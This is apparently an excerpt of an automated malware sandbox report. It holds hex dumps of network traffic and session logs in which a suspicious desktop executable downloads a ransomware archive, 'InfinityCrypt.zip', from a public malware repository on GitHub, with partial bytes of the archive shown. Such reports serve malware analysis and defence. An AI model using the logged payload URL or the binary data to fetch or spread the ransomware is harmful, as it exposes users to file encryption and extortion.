                                                                                                                                                Data Ascii: VfvpF7% qRJ#<K}S7gm3neyEA|p]/irhYOnR<A<9<0h+nn?S:Ad/-~tonrrRQ|#NQ<l1&vJp0]IY#ZVX[j|!
                                                                                                                                                2022-09-29 12:51:12 UTC195INData Raw: 82 07 ac ab 49 58 1f b3 d4 0e ab c0 f2 fb a5 38 3d f9 52 5f f4 0e 6d 64 0a 5f 5f a4 e5 a0 c8 d8 92 f8 59 71 5d 11 27 ef f1 23 2d cf 16 5c 0d e4 cc 86 ec 72 da 98 5e 3b 73 56 23 79 60 65 6c f7 6f 4a 92 d7 0c 60 cf 05 ec 4e 83 cc e1 7a 29 9d d8 be de 46 37 4a 6d 51 0a c9 fb 10 81 cf e9 fb fd a8 7b c5 71 ea 50 6e 9e 29 2d 15 09 b9 01 55 a6 88 04 a4 0a be 56 21 59 c7 29 2c 97 7d 7e 68 2e 45 bf ad 41 cd 30 95 f3 27 7f 33 2e 98 4f 0c ec 0c b0 d8 07 ee f7 16 73 f7 7b 94 4d 89 73 d2 25 b3 3a 2c 5c 15 b7 40 55 71 e1 59 39 d4 5f af 8f 0d 74 21 d6 60 b9 61 a4 45 e3 a3 db ed 95 33 b1 b8 a8 08 f2 3a 9d 09 89 29 97 72 00 d9 35 ff 87 d2 b8 e8 d2 20 3e a2 b8 67 d4 3d 0b 1c 91 e7 ab f9 9a 78 aa bf 22 35 15 84 83 98 3d 48 4a 3d da c5 14 c1 4b e3 08 b9 cf f6 6d 08 32 ec 3b
                                                                                                                                                Data Ascii: IX8=R_md__Yq]'#-\r^;sV#y`eloJ`Nz)F7JmQ{qPn)-UV!Y),}~h.EA0'3.Os{Ms%:,\@UqY9_t!`aE3:)r5 >g=x"5=HJ=Km2;
                                                                                                                                                2022-09-29 12:51:12 UTC211INData Raw: 4a b7 fa ea 21 46 9a 5a 48 f2 61 97 a8 f0 ed aa 5a 35 6a 3f 65 29 f4 87 9a 1e dd 3b 89 de 41 f4 19 2c be 62 e5 f1 05 0c b0 c1 aa 18 46 6e d2 42 0e 4f e2 1d 3d 90 c5 da 3c 02 4f 44 ed 25 e4 81 98 59 52 bc 40 4e 11 79 33 f5 0b 74 db cd a5 9a 21 65 01 b1 51 b2 76 47 b9 be bc 8d 4f fd 4c 48 6a d4 0b 13 21 90 5c 5d 80 eb af fc d7 11 7e 21 22 39 46 fd f6 27 fc cc e8 26 53 74 0c 72 38 fb 5d b5 ce 9c 4c 75 60 f6 84 17 23 d7 bd fa ad 9d 16 62 9b ce 07 b9 04 79 56 67 d2 8b 79 38 b5 9c 74 5b 5e 43 64 62 2a cf 30 30 05 6f e7 9d 2b 4b 4e ac 01 52 63 74 0d 41 8c 79 12 79 6b 36 a7 55 a3 22 e9 6f f8 8e 8d 0b 73 83 10 5e b4 6c fe b1 b3 b8 ab 0f 84 fa a3 67 d9 ca 8d c2 e9 b0 67 a4 46 51 1e 40 d4 0e ba 2e 96 ac 57 b6 11 b7 fc 9b 6b 5e 89 c3 d5 97 f2 f2 bc b6 1e 2b e6 aa 50
                                                                                                                                                Data Ascii: J!FZHaZ5j?e);A,bFnBO=<OD%YR@Ny3t!eQvGOLHj!\]~!"9F'&Str8]Lu`#byVgy8t[^Cdb*00o+KNRctAyyk6U"os^lggFQ@.Wk^+P
                                                                                                                                                2022-09-29 12:51:12 UTC227INData Raw: a5 3d 82 9f 32 24 34 5c d1 a6 e8 6b e5 29 ed 9d 0a 0a e0 da 92 4b e7 d7 d7 5d 09 11 8d 70 3a a4 fb 79 2a 33 ac b9 ec 3b 96 60 2f 22 e4 4b 4b ad 09 ea c6 3e 7e 8b 7a 36 4c d5 36 19 75 ad 6e 7f 11 ac 70 47 2e b8 ed 67 61 bc 27 db e2 60 dd 6b 39 9f f4 40 e7 e3 ab d4 d9 87 cd c6 35 1f 0f f9 df cc 98 f3 4b 81 99 8e b2 d1 21 15 eb 75 2a ec 61 65 2d 48 e8 98 10 2d dd 97 aa 5a 6f 0f fe 2b 49 57 bb 73 22 75 3f cb 50 f3 4c 06 d2 36 bd 5b ba 9c 64 c2 29 b5 c1 ef 55 9e fd c8 d1 9b 86 e8 01 32 94 d0 1e 66 f1 46 de 2b bb c7 5a 04 c1 da 8b 04 7a 51 62 3f 51 78 a8 30 af 61 9b 03 76 b6 0e 48 f6 44 ae 90 6f 47 a0 13 0b 24 c8 fd 3f f9 95 4c 4b 0d 2f d9 66 14 a0 f7 c1 06 6d a1 d8 1b 83 f9 7b 6b ea 01 9e 6d 47 90 41 f6 5a 45 a6 1b 52 09 89 7b 86 5e cd 61 15 6f ca 8d b8 96 c8
                                                                                                                                                Data Ascii: =2$4\k)K]p:y*3;`/"KK>~z6L6unpG.ga'`k9@5K!u*ae-H-Zo+IWs"u?PL6[d)U2fF+ZzQb?Qx0avHDoG$?LK/fm{kmGAZER{^ao
                                                                                                                                                2022-09-29 12:51:12 UTC243INData Raw: 92 8b 0c b3 1b 22 92 6f 65 81 de 60 43 67 70 38 ae 18 5c df fc 68 6a d6 d4 a1 85 ef 1a b8 ef 8b 35 bb c5 49 ca 46 88 8a 43 1d 20 a1 eb 41 a2 89 ff 37 bc 8b ee d2 84 6c 51 7e c4 fb 96 e2 85 03 a3 a1 23 f0 b3 c2 69 02 0d c9 c2 62 5f 00 fe 0d 57 49 f6 f3 a2 af c0 43 b6 7a 90 aa cd 29 50 20 b1 f8 5a 86 28 6d ee 66 33 6e b6 29 32 28 7c 0a b5 1f 0a 88 44 05 2f c1 41 55 53 e8 e8 fd 33 0a 08 49 e5 88 f5 cd c4 9d be 28 20 81 8a 19 db ee 31 95 5a 92 f1 6d f8 4c 53 48 ba ed eb 99 73 7a 56 2a f7 6f 86 db 7f 90 f8 24 81 52 08 ed d3 43 9a 53 a5 06 a3 4f 01 1c 71 d2 33 d0 a5 84 d7 59 22 4d e7 a3 62 d5 13 dc 0c 1d e4 37 e7 9d 5f 32 40 05 f9 39 90 37 65 18 da ce ab eb be 8e 21 06 a3 41 af 27 97 68 30 da 3a 0d 26 8e 2a cb 4a 51 b5 6d f7 7f 74 9c 19 1c 17 04 41 46 b4 56 83
                                                                                                                                                Data Ascii: "oe`Cgp8\hj5IFC A7lQ~#ib_WICz)P Z(mf3n)2(|D/AUS3I( 1ZmLSHszV*o$RCSOq3Y"Mb7_2@97e!A'h0:&*JQmtAFV
                                                                                                                                                2022-09-29 12:51:12 UTC253INData Raw: b6 99 00 1e 44 bc 72 e4 68 c1 8e cb 5c 99 bc c6 e8 19 6c ee 00 4a 7c d0 9c da c6 a1 c2 c1 d8 94 81 24 49 c5 03 59 64 11 b9 12 a6 88 e1 42 6e dc 85 9d 1f 96 90 35 9a b8 cd bd 88 c5 23 2f b7 7e 37 21 a8 c3 ff 7c 3a 7a 29 0c e7 0b 07 55 21 cf 8c 28 55 c4 6e 9a 14 fe fd 3d fc 78 bc 99 13 15 f9 55 99 a0 4c d0 97 39 12 50 4d 1d 63 fb a8 88 87 06 41 af eb a8 aa 2f 89 c2 3d d7 61 7c 52 6a a5 ec ca 25 c3 46 a3 84 01 5f 70 9f e0 8a 82 63 29 4f 53 27 b3 8d c9 2c af 27 6d e3 a9 a8 ac f4 b5 28 20 13 0f 3a 91 0c 29 88 58 66 f7 d4 e7 ad c6 9b f2 07 84 31 1d 56 0b 5a f8 7a ab c5 33 52 dc 71 93 90 94 60 2f 6c df 67 f8 fc 60 c4 b8 a6 dd 10 a2 e7 fd 6a 73 e1 a3 6c e2 b2 82 e2 e0 fb 96 af 46 21 97 96 cc 48 9a 47 19 85 02 69 07 44 93 ce e1 1b fa af 2e 95 ad db 60 a0 a4 6f f0
                                                                                                                                                Data Ascii: Drh\lJ|$IYdBn5#/~7!|:z)U!(Un=xUL9PMcA/=a|Rj%F_pc)OS','m( :)Xf1VZz3Rq`/lg`jslF!HGiD.`o
                                                                                                                                                2022-09-29 12:51:12 UTC269INData Raw: 39 89 53 e4 fb 8e 75 c7 1d 43 23 52 ea d9 12 c0 94 04 72 ab ef f8 ad ef 47 9c a6 dd 7b c8 2d d1 3c a2 f2 e3 5f 8d c1 a5 d9 76 63 e1 aa ed 59 45 86 27 86 90 76 1b 49 fe e8 f3 b5 84 3e 86 fb 24 48 78 59 10 6d ed d5 32 ff 1a 6a 55 01 34 69 dd 6c 3f 26 c9 fa 9b d8 05 28 1c ff 96 25 c7 c0 22 9b ba e9 70 ff 04 2f 6c 06 a0 7b ea ee bc 62 47 0a be 40 e3 e9 21 18 d6 c5 fa 3c 5e 34 ee d6 76 70 71 6c d2 a7 20 b8 c7 dc 81 96 ed 51 04 65 37 89 56 90 89 c1 92 30 f9 c3 4e e6 28 a9 38 aa 4e e6 c7 b7 5b d9 f5 ca 03 b9 d2 e2 a8 8e bd f0 0b e0 ea c5 ed a4 e3 11 ce b6 bf 28 e9 6e 7e 39 36 a3 e4 c4 65 b2 b9 5c 01 bf 3f 00 08 88 3f 88 d0 ff 57 fa 94 79 40 97 46 c2 16 18 ab a7 2d 12 ab f2 01 6c b7 d4 5b 6f e2 ba fe ff 9c a7 ff be d2 a3 52 78 2a 2d 55 63 a3 3c d3 ad f9 1d be 54
                                                                                                                                                Data Ascii: 9SuC#RrG{-<_vcYE'vI>$HxYm2jU4il?&(%"p/l{bG@!<^4vpql Qe7V0N(8N[(n~96e\??Wy@F-l[oRx*-Uc<T
                                                                                                                                                2022-09-29 12:51:12 UTC285INData Raw: 42 16 68 7b c0 b1 db 7d e7 10 24 5a e5 c2 85 f2 90 ac c7 40 dc 90 3c ae ad 73 24 6f 9d ac 86 d5 44 f9 cf 14 a0 a4 49 98 15 0c e2 8c f0 a3 21 d6 d1 0f c9 e1 e1 b6 a9 4f 1c 3f fb b8 70 6e b6 e1 03 0a 62 d8 be 7c ff b5 fc 51 84 d6 b1 6c 0e de c0 77 df d7 34 69 fc c9 a4 6d db af ec 1b 92 42 b2 62 3d 49 f5 65 aa cd ae 21 69 74 d6 f3 a7 b4 e0 8f 2d ac 69 1c 20 26 0b f8 8a 4f 48 3b 85 f4 11 4b 42 ed 6e a5 d2 e2 4e c9 5d 10 53 29 4b 92 e0 be fa c0 fc ef 2d de ae 41 b3 bc 8c 43 c5 0d 5d 07 3a a6 1d 8d 6c 9b 29 f1 9a 5d 2b 4e b3 96 da e7 ed 84 16 4d a2 7f 8e 5d bf a3 e0 43 49 24 7b 02 db bb d6 93 96 cd 27 78 b3 6b 72 38 0a 3a fb 53 74 ca 29 59 bc fb 46 b9 86 d0 e9 95 9b 63 47 1e c6 c6 49 e7 30 bf c0 df e3 83 bc ae 6b df ac 19 9c f2 52 c0 5f 9a 66 1d 39 41 11 58 aa
                                                                                                                                                Data Ascii: Bh{}$Z@<s$oDI!O?pnb|Qlw4imBb=Ie!it-i &OH;KBnN]S)K-AC]:l)]+NM]CI${'xkr8:St)YFcGI0kR_f9AX
                                                                                                                                                2022-09-29 12:51:12 UTC301INData Raw: 72 ee ba fd cc 9c bd c3 4e 55 a7 63 d0 86 9d 8b 99 68 6b 69 f4 24 74 d2 30 8f 2b 58 03 cf f6 65 f7 49 ae 4d 71 a6 1b b9 40 50 a0 70 05 f6 93 2d f9 05 5b 26 c0 87 e6 d0 83 99 8b ac dc ef 50 cc bf 3e fb 0f ce 6e 75 12 da b9 bf 71 63 69 fc 8d 90 48 34 ca a1 08 ee 6c 4b 52 34 18 70 45 25 14 17 65 ff c8 41 d8 2e c7 d4 80 94 b3 f6 7f cb a9 e6 f7 a8 a9 0c df 50 a3 4e 2c 85 c5 05 ea f0 95 29 95 a1 0d ad df c9 1e 26 fe 1d 3e e0 eb ae 77 8d 7e b6 41 5f 12 c3 ab 4c 9e 49 8e b7 fd 39 3c 0b 41 cb 66 d0 fd 5f 99 f8 ae b4 1a f7 b0 7f d8 a2 c3 99 d0 59 e6 42 52 b3 f3 53 fd 1c 1f f3 05 a7 b1 5f 0a e3 f0 92 28 a6 9f 96 30 4b 85 b8 71 24 03 28 f8 e2 fb c5 1a 1f ca 40 34 32 7f c8 f8 34 93 d6 61 c1 8c 8b d2 c6 93 50 dd 1a 44 b5 34 79 db 97 bd c2 85 3d 0a d3 2a 67 bf f4 32 93
                                                                                                                                                Data Ascii: rNUchki$t0+XeIMq@Pp-[&P>nuqciH4lKR4pE%eA.PN,)&>w~A_LI9<Af_YBRS_(0Kq$(@424aPD4y=*g2
                                                                                                                                                2022-09-29 12:51:12 UTC317INData Raw: a7 bc 1b e7 4d 1a 9e c4 1a 3b b3 01 80 d3 e6 8d 37 53 68 3a 36 2f f9 ac f1 be ba cd e3 15 04 81 fb bf 53 e8 48 79 ac a6 fd 96 94 9b 90 5a dd 97 02 67 cf 2c 31 9c 6d 58 69 a4 b0 6a fc df 2a 53 2a 46 70 53 fa e3 b1 bb 1a f4 b0 1c b9 ce fb 6b 4e 23 19 b6 57 9e b9 1c bb dc 4b 13 6f ea 94 99 1d ed ed 05 4c 20 4d ad f7 2c 46 ce b8 af cc 78 27 07 e6 f6 b7 0d a4 cc 1a 60 99 c9 33 38 16 d3 7b bd 4b ed d2 9f 85 c1 2e c8 e1 33 2d 7b 56 b4 a8 dc 0d 0a a2 3d 13 9c 5c 90 d6 17 01 fd 5d 96 46 dd f8 4e 03 a9 7d 15 84 e4 f7 b2 4f 34 49 e2 3d 4b 31 85 14 a5 b1 8f da e8 c5 1d 81 ec 04 09 2f 81 21 ce 54 0e c7 40 36 ab 90 89 94 e1 bf f2 fc a6 89 10 60 40 ee db 31 2b 41 c8 ff da 5e ad a6 b1 45 b4 ed fe 89 b4 02 ca 63 c5 46 bf 19 b9 e7 1c e9 83 78 ee fd 7f 9d 1a 2e df a1 81 f5
                                                                                                                                                Data Ascii: M;7Sh:6/SHyZg,1mXij*S*FpSkN#WKoL M,Fx'`38{K.3-{V=\]FN}O4I=K1/!T@6`@1+A^EcFx.
                                                                                                                                                2022-09-29 12:51:12 UTC333INData Raw: 8b 6d 9b f4 38 89 f4 56 77 6b f2 bc 49 f3 b8 e8 ba 99 7d 9a ed d2 28 38 09 a5 94 9f 6b da e4 66 b4 ff 2e 44 d5 f8 c9 fd ea 54 5a 97 95 47 60 4c 8c 28 37 d6 08 9a 25 93 d8 3b b0 5c 25 e2 1f 91 cc 89 11 34 07 04 4b 63 80 91 eb eb 9a d6 b2 64 6f 51 ff 0f 6e 69 ab 2a fa 8c 47 4d 15 95 43 7e 29 4c c3 72 8e 65 69 43 01 9a 20 69 d8 ce fd 19 31 b6 e6 40 3b 43 be 95 82 cf 54 8b 60 fb 37 7d f3 cc ac 2d ba 4b 27 b5 95 32 cf 04 6b 4e c9 f9 df 27 2e e5 48 ac 79 c6 bf ea 45 1b 88 1c a0 77 de 4a 14 dd df d8 fa 2b c5 c8 8d 04 56 eb d1 f3 e4 53 72 9e 6d 7e b2 ad b1 d9 32 5f 46 6b a6 fa ea 8a 6f ab 71 9f 71 34 c6 41 ef 76 a0 d2 8b 39 65 c3 4a 6a 98 a1 99 9a 69 13 50 67 92 a0 1a 3c 29 dc d7 a2 cc 7c 96 28 0c a1 fd 72 96 8b bf a8 d9 bb ab 09 90 c8 8e ed 45 62 fb 23 e4 7d 82
                                                                                                                                                Data Ascii: m8VwkI}(8kf.DTZG`L(7%;\%4KcdoQni*GMC~)LreiC i1@;CT`7}-K'2kN'.HyEwJ+VSrm~2_Fkoqq4Av9eJjiPg<)|(rEb#}
                                                                                                                                                2022-09-29 12:51:12 UTC349INData Raw: d2 e9 66 6b 1b d4 0e f7 a6 f7 97 f2 66 41 3d 26 29 bc 5b 32 82 78 b3 b1 7e ef a5 2b 1b 04 51 1b 6b 1b 41 ec 19 66 b3 48 08 37 ae c6 9f ab 95 8b f7 53 3f 2a 30 66 a8 b8 55 94 bc c0 5b 53 54 da 48 87 0a dd 6a fd de f4 ff ec 44 6d ec 03 5e 9a e5 cf c6 99 4e a0 a2 25 f8 f7 ac bd 27 07 1a 6c 7c 52 64 f2 8b a6 95 81 63 62 45 76 79 64 ed 58 ed 94 51 51 7a 7d d5 d1 85 16 ed bf 2e 12 92 2d 4d 39 61 60 52 ec 57 92 80 a2 2c 94 dc 12 71 ce 72 cd c2 3c 72 01 9b ee 01 57 ae 9a 52 55 c3 8b 4f 38 25 06 36 8c c6 7d eb 9e e7 13 88 99 4e d2 4b 4c 16 20 b9 e2 20 28 d2 e7 e2 c9 e5 4f 70 b7 83 c5 0e 7a e4 68 74 a1 c0 99 66 a6 87 ea 64 c1 c9 23 ef 44 6a 5d 18 de 3d 08 f2 b3 b5 1a 17 b7 22 60 f8 ed f9 e6 c1 27 ae 5f c2 78 ca 55 78 1d 6c 06 cf 32 55 ea 8c 73 65 84 40 75 c6 48 61
                                                                                                                                                Data Ascii: fkfA=&)[2x~+QkAfH7S?*0fU[STHjDm^N%'l|RdcbEvydXQQz}.-M9a`RW,qr<rWRUO8%6}NKL (Opzhtfd#Dj]="`'_xUxl2Use@uHa
                                                                                                                                                2022-09-29 12:51:12 UTC365INData Raw: 25 f1 23 15 4a fb df 8c 18 8f 2f 39 7e f9 66 53 a2 e5 ed 16 1a b8 be d7 60 d7 81 35 91 15 9d 63 60 0c 7a 42 ac ce a1 e7 a9 12 54 13 69 54 45 38 ad 30 71 79 6c 20 74 44 2a c0 33 37 ff 7c 2b 17 4f 0a 61 56 f1 4a b6 c2 77 67 56 94 13 a4 78 1a 29 51 47 9f fb 62 0a d3 05 5f 68 14 cb c5 56 72 a0 6c dd 42 fb 9f fc d9 91 98 84 21 4d db 85 4d 99 a8 26 48 42 52 61 30 91 56 6e bb 50 4f a9 4f 9b c9 cd 2f 4f 6d bc 72 26 fd 03 e6 f0 25 a4 c2 6b 75 4d b2 90 fe ba c6 e0 53 da 58 f6 dd 9a 8c ff 8b 6a 12 df de 07 15 ee f5 cd e1 34 52 db fb 41 ec ee 01 07 6d 7f f3 a8 5a f6 c5 b7 18 10 60 69 66 43 fb 97 19 2a 7d 57 da 0e a3 17 8c e5 c0 f5 14 d7 a9 8a 02 52 88 25 bc ef 8e ba de 6d 81 2f 90 31 99 77 3f de 39 ba 7a b5 fa d2 68 84 70 66 e4 b5 f7 6c ac b0 9c 58 20 c2 0c 44 18 63
                                                                                                                                                Data Ascii: %#J/9~fS`5c`zBTiTE80qyl tD*37|+OaVJwgVx)QGb_hVrlB!MM&HBRa0VnPOO/Omr&%kuMSXj4RAmZ`ifC*}WR%m/1w?9zhpflX Dc
                                                                                                                                                2022-09-29 12:51:12 UTC381INData Raw: be 87 49 ef b4 ac 86 6d 69 50 97 71 49 d1 bb 8b 12 7e 16 3d 3b 51 c7 6a 1b ab 2f 36 bb 74 2f 76 3b b2 74 c1 3b af 1e e9 da 1f ca f4 c9 0a ae 46 1d 48 dc f7 89 6e fe 47 e1 dd 6d 8c bf cb 33 92 90 cd 24 e6 8c b8 99 43 f3 62 07 27 21 c4 b6 72 ca a2 a3 1a 7c 91 46 b6 23 94 3d 1e 48 57 87 bb 89 67 48 3d 1e 0a ce 2e 38 48 00 62 e9 3c 98 f9 dc 04 04 dd 54 9c 7c a1 9b 63 8f 17 bf 31 15 9d 34 41 5e 2d 2b bb 02 93 18 05 63 13 e4 c7 61 62 31 7e ea 08 46 ba 6a 74 e2 1c a0 7a 2d 4d ea d9 28 fa 72 09 a2 ec df d3 e6 5e 52 33 da e6 c9 69 52 31 93 2a 37 0f a9 5e 62 a3 3b 95 8a 13 e7 20 bd ef c6 04 fb 83 d0 f4 43 b2 44 5d 81 5d b7 78 c5 67 25 b1 9d 62 3b ce ab 37 aa 92 a3 41 f6 10 5e 17 bf 43 de 59 98 6d 7c d1 a3 32 12 25 6e 1d 70 eb 88 3b 05 d7 ad e7 d5 88 ab 4d 6d ae 31
                                                                                                                                                Data Ascii: ImiPqI~=;Qj/6t/v;t;FHnGm3$Cb'!r|F#=HWgH=.8Hb<T|c14A^-+cab1~Fjtz-M(r^R3iR1*7^b; CD]]xg%b;7A^CYm|2%np;Mm1


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                10192.168.2.549710140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:20 UTC1113OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:20 UTC1113INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:13 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:20 UTC1114INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                11192.168.2.549711185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:20 UTC1116OUTGET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:20 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 34300
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:20 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6946-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455880.496908,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: d1cf4e9661a7b3749bde453ce955e37e07c988cd
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:20 GMT
                                                                                                                                                Source-Age: 51
                                                                                                                                                2022-09-29 12:51:20 UTC1117INData Raw: 50 4b 03 04 14 00 01 00 08 00 05 80 55 4d 73 32 bc 1b 3e 85 00 00 00 4c 03 00 1c 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 66 69 6e 69 74 79 43 72 79 70 74 2e 65 78 65 82 87 5a 39 90 6f 1d 4b 56 8c 6f a5 78 75 67 df b9 5d 1b e7 c8 de 51 7e 50 59 e3 51 55 6b 55 48 f4 fd 3a ce 54 5a 2e e4 e9 b5 45 cd 28 59 f7 4e ba 07 6e e5 b7 9f ae bb 8e 1b b9 29 ca 82 bd 23 6d 87 ef ce 14 40 b3 aa 88 93 6c cd 38 c9 6b 8f f5 5c 89 57 2c 56 38 77 b2 d9 b4 13 71 55 9c a0 8f ea 4e e3 7c 56 be 4e 74 51 2a e5 23 32 c4 59 6f 50 84 15 53 3b c3 7d 7c 29 80 9c 4e c8 31 f9 27 3f f8 1d 7f 92 10 30 65 9c 61 49 18 4d af bb 52 c4 c6 5a 72 01 0d 3d 7d 39 80 54 2b cd c4 d2 9f b3 f0 40 5d 9b e5 dc ab 59 bb d8 29 21 91 f7 7a 11 f3 62 7b 82 05 97 bb ef f9 6b 35 d2 43 eb 1d 57 43 55 0a
                                                                                                                                                Data Ascii: PKUMs2>LEndermanch@InfinityCrypt.exeZ9oKVoxug]Q~PYQUkUH:TZ.E(YNn)#m@l8k\W,V8wqUN|VNtQ*#2YoPS;}|)N1'?0eaIMRZr=}9T+@]Y)!zb{k5CWCU
                                                                                                                                                2022-09-29 12:51:20 UTC1118INData Raw: 31 84 61 77 b6 e3 c9 b2 da 75 c6 fa 65 a5 e9 aa c3 75 e8 3a d7 90 b5 dc 6a 53 45 eb ed 0a b9 1d 24 b2 c1 7e da 22 8a 62 db 0d 02 2b 2f b4 18 81 e8 f4 15 82 a8 a1 41 3a 78 e0 bc a2 3c 90 67 40 1e 1d ff 73 6c ba 96 e0 67 29 52 b9 ad 8d fc ac 7e 00 ef a4 77 2c 98 34 4d 13 52 e1 41 b0 97 2c 53 fd 4c 71 46 9e 56 50 70 47 69 7c ed 5c a5 40 f9 4b e8 93 5e 7a 82 39 df e2 48 d8 e2 76 12 79 b6 92 03 be e3 af bf fc 58 d5 ed 38 bf 0a 7d f1 8b 9b eb c2 95 a7 44 af 7a e1 a2 e0 16 93 90 6e 04 81 f0 74 7f 3d 12 5c b6 40 90 ac fa 1a 85 fc 53 33 0f 75 b1 9b 22 d8 0a 1d c4 03 cd e2 db cb 30 cc d2 98 b6 8e 49 fe b3 f8 08 bc cb 18 60 6d 04 a0 b2 f1 3f 66 77 0f b2 18 86 ea 48 b8 69 da 1c 96 e1 85 7e 6b 92 6f 29 c0 4e 78 ae f2 8b cd 7b 83 02 2a 8b dd 97 64 9e c2 0b c7 ea 92 de
                                                                                                                                                Data Ascii: 1awueu:jSE$~"b+/A:x<g@slg)R~w,4MRA,SLqFVPpGi|\@K^z9HvyX8}Dznt=\@S3u"0I`m?fwHi~ko)Nx{*d
                                                                                                                                                2022-09-29 12:51:20 UTC1119INData Raw: 67 ff 25 ef e2 d5 38 39 2a 01 18 c5 98 77 49 c4 f5 60 e4 74 53 1b 7a a3 ae 31 94 71 cf e6 3b a7 df fd af 55 0c c5 2e 29 fe d7 0c 03 b0 4f ba b1 7d eb 34 fc ef 2c 74 15 98 88 eb 79 53 4e e3 e2 01 da 5a a2 24 2f e6 62 c9 1d 4f e7 7e 8a e8 e2 bb aa 3d 4f 40 b2 1c 2b 83 ac 7a f1 cf c6 c6 67 50 80 02 9e d9 04 7e 31 4f 3a 77 16 a3 3c 54 7e 34 cf 67 de dc 30 7e 1c 7f ee 45 d3 87 33 d5 ea cd 9f 13 25 1f 4c 65 4f a7 a0 ab 9e 4a 7c 73 41 49 cb 6c e5 34 10 09 58 bc cf d6 85 a3 ba ad f2 7e 58 1d 28 5b e0 40 e7 7a 10 3a 65 06 2f db 29 b3 8d d7 b2 af 82 b4 8b e8 fe 33 19 85 7c 3c 31 af bb 23 36 05 23 0b 98 0e 10 24 3e a3 a2 7f 3b 5d bc 56 17 39 ff c1 4c e9 98 de a9 ab df e2 a9 8b b3 33 4b 7c 32 29 01 0d 02 1e 20 fb 0a 2e 6e 8c 75 b1 c0 62 cf b9 d3 53 57 3a d6 9b 7d c1
                                                                                                                                                Data Ascii: g%89*wI`tSz1q;U.)O}4,tySNZ$/bO~=O@+zgP~1O:w<T~4g0~E3%LeOJ|sAIl4X~X([@z:e/)3|<1#6#$>;]V9L3K|2) .nubSW:}
